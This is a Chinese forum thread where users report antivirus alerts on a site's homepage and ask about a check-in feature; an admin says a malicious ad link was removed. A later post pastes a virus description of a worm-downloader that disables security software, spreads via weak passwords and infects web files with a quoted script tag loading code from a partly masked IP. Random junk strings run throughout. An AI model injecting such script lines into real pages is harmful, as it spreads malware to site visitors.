网站报毒：  网站首页只要一刷新就有！！ [复制链接]

                           我的杀软是avast4.8，  今天下午两点登录时先是要加载一个叫“UUSEE”  （有点像“悠视”）的.DLL，随后安装运行了那个后刷新又进时报毒（图）。只是没提示“删除”病毒或是“清除”文件，估计只是疑似，但只要刷新首页都会有报警提示！！  请管理员注意了！！ =}v}my3y"  
q|v(Edt|_[  
y
wb4LKD  
                           另外，不是说“每日签到”程序已经去掉了么，为什么一些“出来乍到”和“普通会员”都还能“签到”（状态显示：  已签到 -XX 次 / XX 天）。 偶07年4月注册的，最近3、4个月来几乎每天都过来看看，希望好心的网管帮我搞一下！！！ @:U+9[  
(A?H1 9  
NDs!a  
8&Oa_{1+Q  
  

偶 签到时提示   “所在用户组不允许签到”。 kgI=0W>  
7G[ GHc>  
是不是还有部分“星级”会员可以签到呢？    还是 ，所有人都不能签到了。 或是，系统自动管理的技术问题？         但一些当前“在线者”（甚至一些最近才注册的“出来乍到”者）明明都是“已签到”嘛！？     

已经清除了！是一个恶意广告链接。请大家再试试！感谢大家反馈！！

kan kan  ,

刚刚上线依然存在!!!

有的是系统缓存！请清除缓存再试！

我的没有啊~

我刚开机，也是报有毒，也是av杀软。。。晕

Win32.Troj.Downloader.c.45056 8Qz7uPq  
病毒名称(中文):感染虫下载器45056病毒别名:威胁级别:★★☆☆☆病毒类型:蠕虫病毒病毒长度:45056影响系统:Win9x WinNT x\hn;i<  
病毒行为: %H}Y]D~R  
K}=8:BaUL  
这是一个蠕虫病毒。该病毒运行后,会指定的网络上下载病毒程序,并且会搜索局域网内机器,以弱口令进行尝试性连接, 一旦连接成功,则判断该机器弱口令是否有足够的权限, 有则向该远程机器发送恶意数据,然后利用windows漏洞来下载程序,予以执行. y]YS2^  
e3={$Ah  
1.病毒运行后，产生以下病毒文件 A Wh*<H  
%WINDIR%\ SYSTEM32\tmipo.bat HA.NZkq.tV  
%WINDIR%\ SYSTEM32\taimpo.txt ,o>pmaoLs  
A[ECa{v  
2.添加病毒启动项 Ddl% V7  
启动项名:svchost 对应路径:%Documents and Settings%\Administrator\桌面\ctfmon.exe YV3TxvXMR  
8@W/43K8-  
3.病毒会触发taimpo.bat病毒文件,用来关闭"360安全卫士",使用户的安全性能降低. J]Gc  
t2-nCRXEP  
4.病毒会检测连接的远程机器,当远程机器的登录木马是弱口令时,则会对该机器进行攻击,最后下载adi.vbs到用户机器上. 4=F]`Lql  
/,!7jF:  
5.遍历磁盘，查找*.htm、*.PHP、*.ASP等网页文件，开始感染,插入一段JS代码： 2.Eu+*UC  
script language=javascript src=http://218.**.**.248/qq.js